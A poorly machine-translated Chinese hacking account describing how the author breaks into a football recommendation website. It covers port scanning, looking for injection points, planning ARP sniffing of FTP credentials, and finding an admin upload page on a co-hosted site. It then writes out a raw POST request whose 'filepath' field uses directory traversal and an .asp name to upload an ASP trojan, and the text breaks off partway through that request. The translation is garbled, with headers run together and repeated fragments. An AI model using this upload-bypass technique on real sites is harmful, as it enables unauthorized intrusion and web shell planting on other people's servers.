A true invasion ------ 对 渗 一 一 推 站 站 站

xiaoxiao2021-03-06  16

A true invasion ------ 对 渗 一 一 推 站 站 站

Source: http://www.17nc.com/ Due to some reason! We have to penetrate a football recommendation site - www. ******. COM is infiltrated, first of all, is of course stepped. Sweep with the scanner. Look at what service looks. Open 21, 80, 554. FTP is serv-u, IIS is 6.0, there are 554, hey, this service is what I forgot. I only know that I can overflow and try it. failure! ~! ~ 1 There is no way, come back to his site, and observe where he has a loophole everywhere. Or injection point. I have been looking for N long. I can't find it, he is too functional. Use the Guilin veterans to check his server to bind several domain names, or sites. Sixteen isolated. Now I want to do it. Find a relatively weak come in. Then hit our goal. Unfortunately, they are all the same football recommendation site. And all of the full-scale companies are designed for them, and their program security is not bad, basically can't find anything that can be used. I can only use the most despicable tricks. Arpsniff sniffs its FTP password. As for the principle, I will not say more here. If you want to know, you can go online to see related articles. The most successful example is the "danger of the external black mainframe" written by the small road. To sniff, you must enter the machine in their gateway, and it is best to open 3389, with superscan3.0 to fly their network segment 61.143. ***. 254, unfortunately. There is basically a firewall, hehe. I am afraid of firewall. But the magic is one foot, the road is high, huh, huh. Naturally there is a way to solve his method. Open a 21-port, 3389 port, and 80 port. I sweep, sweep it. Almost I am desperate, the host of the network segment doesn't have a few, and a lot is the Linux system, and it is helpless! ~! ~! ~ 1 Of course, the process of finding a vulnerability host is long. I have encountered a lot of failures, and I only said that I only said that IP with Guilin veterans to find IP 61.143. ***. 121 has 5 sites (our target IP is 6143. ***. 108) One trial, find SQL injection port, depressed, almost all static HTM files. Just when I desperate. After the URL, try http://www.xxx.com/admin to appear 403 errors, hehe. Explain that this folder is generally the place where the management site is logged in. With the experience, try there is upload, http://www.xxx.com/admin/uopload.asp 嘿嘿, hope, Microsoft VBScript run This property or method is not supported by error error '800A01B6' object: 'form' /admin/upload.asp, line 20 shows this file. But this cannot be the one he submitted. So, try Upload.htm, there is a cute upload page.

See if there is any upload loophole! ~ Check Open Source Code Discovering

Hey. He is dead. Upload paths are defined, classic upload vulnerabilities! `! ~! Not far from success. It is old step now. Cash, edit, submitted with NC.

I tell the contents of the package Post /Admin/upload1.asp http / 1.1accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / x-shockwave-flash, * / * referer: Http://www.***.com/admin/upload1.htmaccept-language: zh-cncontent-type: multipart / form-data; boundary = ---------------------------------------------------------------- ----------- 7D4251A110258ACCEPT-ENCODING: GZIP, DEFLATEUSER-Agent: Mozilla / 4.0 (Compatible; Msie 6.0; Windows NT 5.2; .NET CLR 1.1.4322) Host: www.haotin.comContent-Length : 664Connection: Keep-AliveCache-Control: no-cacheCookie: flux_stat_user = 0.18235000 1095404136621813289; ASPSESSIONIDQSBQTDSA = CODBCEJAHFBAFAGNKBPONJKO ----------------------------- 7D4251A110258CONTENT-DISPOSITION: FORM-DATA; Name = "filepath" ../ TT90_Music_PIC / B.ASP // I added B.ASP Remember ASP ASP ---------------- --------------- 7D4251A110258Content-disposition: form-data; name = "ACT" UPLOAD --------------------- -------- 7D4251A110258CONTENT-4251A110258CONTENT-4251A110258CONTENT-4251A110258Content-disposition: form-data; name = "file"; filename = "c: / documents and settings / support_388945a0 / desktop / S / ASP Trojan Collection /iFOX007V1.10/asp.jpg" // This is changed to him to allow the text to be uploaded Piece suffix, content-type: text / html